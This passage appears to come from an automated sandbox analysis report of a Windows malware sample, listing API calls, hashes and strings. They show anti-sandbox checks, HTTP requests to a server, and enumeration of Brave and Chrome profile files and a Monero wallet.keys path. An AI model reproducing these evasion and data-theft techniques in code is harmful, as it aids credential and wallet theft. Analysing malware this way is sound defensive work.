                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: 0e6abefe62a9e2aa98b699a37bfe6890b3833f24153bc82adb9bb1127c6a1116
                          • Instruction ID: 205fc8a277eafc7693b9f2bfeea5d9d38c34b8994c18888926eb2283f0d40e0a
                          • Opcode Fuzzy Hash: 0e6abefe62a9e2aa98b699a37bfe6890b3833f24153bc82adb9bb1127c6a1116
                          • Instruction Fuzzy Hash: 66311C70910628ABDB44F7F0EC56AEE777ABF14341F00451CF602A6181DFB45945CFAA

                          Control-flow Graph

                          • (Rendered control-flow graph omitted: node/edge data for the function starting at 00611220, with basic blocks calling GlobalMemoryStatusEx and ExitProcess; executed/not-executed colouring is not recoverable from the extracted text.)
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0061123E
                          • __aulldiv.LIBCMT ref: 00611258
                          • __aulldiv.LIBCMT ref: 00611266
                          • ExitProcess.KERNEL32 ref: 00611294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: d96c4f72886ed75a9a3ed69771f57b5caf08b97400a909c927f5105da6c93277
                          • Instruction ID: dd92222a07b1527ec218b3763bfefc30413643e83943a6a37abe83f630fceda7
                          • Opcode Fuzzy Hash: d96c4f72886ed75a9a3ed69771f57b5caf08b97400a909c927f5105da6c93277
                          • Instruction Fuzzy Hash: F0014BB0D44318AAEF10DBE4DC4ABDEBBB9BB15702F248148E705BA280D67456818B99

                          Control-flow Graph

                          • (Rendered control-flow graph omitted: node/edge data for the function around 00626ABA, with basic blocks calling OpenEventA, CreateEventA, CloseHandle, Sleep and ExitProcess; executed/not-executed colouring is not recoverable from the extracted text.)
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626ACA
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00626AE8
                          • CloseHandle.KERNEL32(00000000), ref: 00626AF9
                          • Sleep.KERNEL32(00001770), ref: 00626B04
                          • CloseHandle.KERNEL32(?,00000000,?,01118F08,?,0063110C,?,00000000,?,00631110,?,00000000,00630AEF), ref: 00626B1A
                          • ExitProcess.KERNEL32 ref: 00626B22
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: d32c06d3907a6ddb1434ff40fb2e1921745e26731f5132b2d3a94f751176ca73
                          • Instruction ID: d5a22e2f8ebd625265d30ac82149436983c7b952eee81de98af1d3d7e457df52
                          • Opcode Fuzzy Hash: d32c06d3907a6ddb1434ff40fb2e1921745e26731f5132b2d3a94f751176ca73
                          • Instruction Fuzzy Hash: 92F05E30940B29EBE750ABA0ED56BBD7B75FF14703F104618B913A11C1CBB45541DF5A

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 1c806b190d718c1e99be193417b8bdb644228a68d38af3c8b53e29a2c8445147
                          • Instruction ID: b0b15c03259518867c91205fc87351f6b558087794481319dd2b55b1fd50e402
                          • Opcode Fuzzy Hash: 1c806b190d718c1e99be193417b8bdb644228a68d38af3c8b53e29a2c8445147
                          • Instruction Fuzzy Hash: 53214FB1D00209ABDF14DFA4E845ADE7B75FF45320F108629F955A72C1EB706A05CF81

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 00616280: InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                            • Part of subcall function 00616280: StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                            • Part of subcall function 00616280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                            • Part of subcall function 00616280: HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                            • Part of subcall function 00616280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                            • Part of subcall function 00616280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: 4a10e14a73a35147f571214c2961a14d10fd12992a679e373afe6cdbf057cacb
                          • Instruction ID: 4d59596e3cb6a834d3aaff738d885b46f1735b4f097b64afcd4d513b310161c6
                          • Opcode Fuzzy Hash: 4a10e14a73a35147f571214c2961a14d10fd12992a679e373afe6cdbf057cacb
                          • Instruction Fuzzy Hash: 6C113370900918ABCB54FFA0ED52AED737BAF50300F40415CF90A5A192EF74AB06CE9A
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 9824f7776fd1aae7e4a96ef5427e030c51f303eb3a540fec0db2eab127e7f678
                          • Instruction ID: bf2041b5300eb23cdf7eb883a4ac39f77d428baba8d55cd0aca3c3c3811849cb
                          • Opcode Fuzzy Hash: 9824f7776fd1aae7e4a96ef5427e030c51f303eb3a540fec0db2eab127e7f678
                          • Instruction Fuzzy Hash: C00162B1904705EBC704DF94DD45FABBBB8F704B12F104229E645E2280C37559448BA1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0061112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00611132
                          • ExitProcess.KERNEL32 ref: 00611143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7e5184f4df4a991d45af125e2bfe6741b4502ad1c0c8df1d54f52feebf4261f0
                          • Instruction ID: 2a5fb6e58b7472e0d9e16beb9fb704f14657243b86ca4179514293783f7bb334
                          • Opcode Fuzzy Hash: 7e5184f4df4a991d45af125e2bfe6741b4502ad1c0c8df1d54f52feebf4261f0
                          • Instruction Fuzzy Hash: 07E0867094530CFBE714ABA09C0AB487A78BB04B03F100154F7087A5D0D6B826409699
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 006110B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 006110F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: a7f452fd440011c9284273ab7bcd76166e0d519767b33e81669923053cc8fe0f
                          • Instruction ID: 911c6711c81bf003f812127552e3eed953f871e2079c1b398fbff0b7253146c8
                          • Opcode Fuzzy Hash: a7f452fd440011c9284273ab7bcd76166e0d519767b33e81669923053cc8fe0f
                          • Instruction Fuzzy Hash: B4F0E971A41314BBE71496A4AC49FEEB7DCE709716F300548F604E7280D5715E40CA64
                          APIs
                            • Part of subcall function 006278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627910
                            • Part of subcall function 006278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00627917
                            • Part of subcall function 006278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0062792F
                            • Part of subcall function 00627850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
                            • Part of subcall function 00627850: RtlAllocateHeap.NTDLL(00000000), ref: 00627887
                            • Part of subcall function 00627850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0062789F
                          • ExitProcess.KERNEL32 ref: 006111C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: 04a1540fb9bb4c1fbff1197fd903da8ab2cf3cd5d3c8384adee35a1ae7f14503
                          • Instruction ID: 4d7440ea80c9c057ca7307a74d838cd327096afa0427c5aa214452a30852676a
                          • Opcode Fuzzy Hash: 04a1540fb9bb4c1fbff1197fd903da8ab2cf3cd5d3c8384adee35a1ae7f14503
                          • Instruction Fuzzy Hash: E5E012B5D1471567CA4473F0BC4BFAA369E6B15746F08053CFA05D7202FE2DE800896E
                          APIs
                          • wsprintfA.USER32 ref: 006238CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 006238E3
                          • lstrcat.KERNEL32(?,?), ref: 00623935
                          • StrCmpCA.SHLWAPI(?,00630F70), ref: 00623947
                          • StrCmpCA.SHLWAPI(?,00630F74), ref: 0062395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00623C67
                          • FindClose.KERNEL32(000000FF), ref: 00623C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: 50c56a1d86340a7e803655ed90db06c9555e482adee29d4505fb9714daa6cd7f
                          • Instruction ID: 54b263323dd3b240ec3bf5fa026e5a81399a0918b9525c477050eeb46551e1e0
                          • Opcode Fuzzy Hash: 50c56a1d86340a7e803655ed90db06c9555e482adee29d4505fb9714daa6cd7f
                          • Instruction Fuzzy Hash: B3A164B1A007289FDB64DF64DC85FEE737ABB48301F04459CA60D96141EB759B84CF52
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 0062A920: lstrcpy.KERNEL32(00000000,?), ref: 0062A972
                            • Part of subcall function 0062A920: lstrcat.KERNEL32(00000000), ref: 0062A982
                            • Part of subcall function 0062A9B0: lstrlen.KERNEL32(?,01119148,?,\Monero\wallet.keys,00630E17), ref: 0062A9C5
                            • Part of subcall function 0062A9B0: lstrcpy.KERNEL32(00000000), ref: 0062AA04
                            • Part of subcall function 0062A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0062AA12
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                          • FindFirstFileA.KERNEL32(00000000,?,00630B32,00630B2B,00000000,?,?,?,006313F4,00630B2A), ref: 0061BEF5
                          • StrCmpCA.SHLWAPI(?,006313F8), ref: 0061BF4D
                          • StrCmpCA.SHLWAPI(?,006313FC), ref: 0061BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0061C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          • Opcode ID: b77ce2c554f3e75c8fedc561496bf99225a68c2f31fd845b00a404e75f2e9ae6
                          • Instruction ID: c5190b1fd490e5fa70ee9421a9dbd025ee1a1aaa605738ddf83ae0f6fbb450e9
                          • Opcode Fuzzy Hash: b77ce2c554f3e75c8fedc561496bf99225a68c2f31fd845b00a404e75f2e9ae6
                          • Instruction Fuzzy Hash: 1B4262729105189BCB54FBA0EC96EED737FAF48300F40455CF90A96181EE749B49CF9A
                          APIs
                          • wsprintfA.USER32 ref: 0062492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00624943
                          • StrCmpCA.SHLWAPI(?,00630FDC), ref: 00624971
                          • StrCmpCA.SHLWAPI(?,00630FE0), ref: 00624987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00624B7D
                          • FindClose.KERNEL32(000000FF), ref: 00624B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 0122672b85aeefdb1ed7dacadd3ad01c7d48ad2f2d4dea867f29c4c305102e55
                          • Instruction ID: c5cff2fef365ca9d8cb96faa1eef5dce87020c50872b0e430c2577ed915d922a
                          • Opcode Fuzzy Hash: 0122672b85aeefdb1ed7dacadd3ad01c7d48ad2f2d4dea867f29c4c305102e55
                          • Instruction Fuzzy Hash: 2F615BB1900618ABCB24EBA0EC85EEA737DBB48701F04469CF64996141EF75DB89CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00624580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00624587
                          • wsprintfA.USER32 ref: 006245A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 006245BD
                          • StrCmpCA.SHLWAPI(?,00630FC4), ref: 006245EB
                          • StrCmpCA.SHLWAPI(?,00630FC8), ref: 00624601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0062468B
                          • FindClose.KERNEL32(000000FF), ref: 006246A0
                          • lstrcat.KERNEL32(?,0111E8D8), ref: 006246C5
                          • lstrcat.KERNEL32(?,0111DA20), ref: 006246D8
                          • lstrlen.KERNEL32(?), ref: 006246E5
                          • lstrlen.KERNEL32(?), ref: 006246F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 69cd201b2b98349b0dd145e00853b377c31342479ce2a4170d2fb7d3756b1275
                          • Instruction ID: e5a9cadada346b2412d8e3f808a21582fad852090897e8e3c7322272dc63fddc
                          • Opcode Fuzzy Hash: 69cd201b2b98349b0dd145e00853b377c31342479ce2a4170d2fb7d3756b1275
                          • Instruction Fuzzy Hash: 695144B1900218AFCB64EB70DC89FED737DBB58701F404698F64996190EF799B848F92
                          APIs
                          • wsprintfA.USER32 ref: 00623EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00623EDA
                          • StrCmpCA.SHLWAPI(?,00630FAC), ref: 00623F08
                          • StrCmpCA.SHLWAPI(?,00630FB0), ref: 00623F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0062406C
                          • FindClose.KERNEL32(000000FF), ref: 00624081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: 5fdc0ec64e2ec1472ef5fba5b2ce6c22d6e76d17b5c7ab9e8474262189a5271b
                          • Instruction ID: 50ef8b7d85083027b90da5a2d7f80121321264ec62fc3c66bf3b6c4daba9fadc
                          • Opcode Fuzzy Hash: 5fdc0ec64e2ec1472ef5fba5b2ce6c22d6e76d17b5c7ab9e8474262189a5271b
                          • Instruction Fuzzy Hash: 055178B2900628ABCB24EBB0EC85EEE737DBB44301F04469CB75996140DB75DB89CF95
                          APIs
                          • wsprintfA.USER32 ref: 0061ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0061ED55
                          • StrCmpCA.SHLWAPI(?,00631538), ref: 0061EDAB
                          • StrCmpCA.SHLWAPI(?,0063153C), ref: 0061EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0061F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0061F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 2d34a05e05b6cdbbb6cc466cc3890d402382b8714dae79f147b1db358723e719
                          • Instruction ID: a1baca7e93c06de205866a0bbb80987e0e2c311494a6d0110eaa2c245d50ae7d
                          • Opcode Fuzzy Hash: 2d34a05e05b6cdbbb6cc466cc3890d402382b8714dae79f147b1db358723e719
                          • Instruction Fuzzy Hash: 37E125719115289BDB94FBA0EC52EEE733AAF54300F40459DF40A62092EF746F8ACF56
                          APIs
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
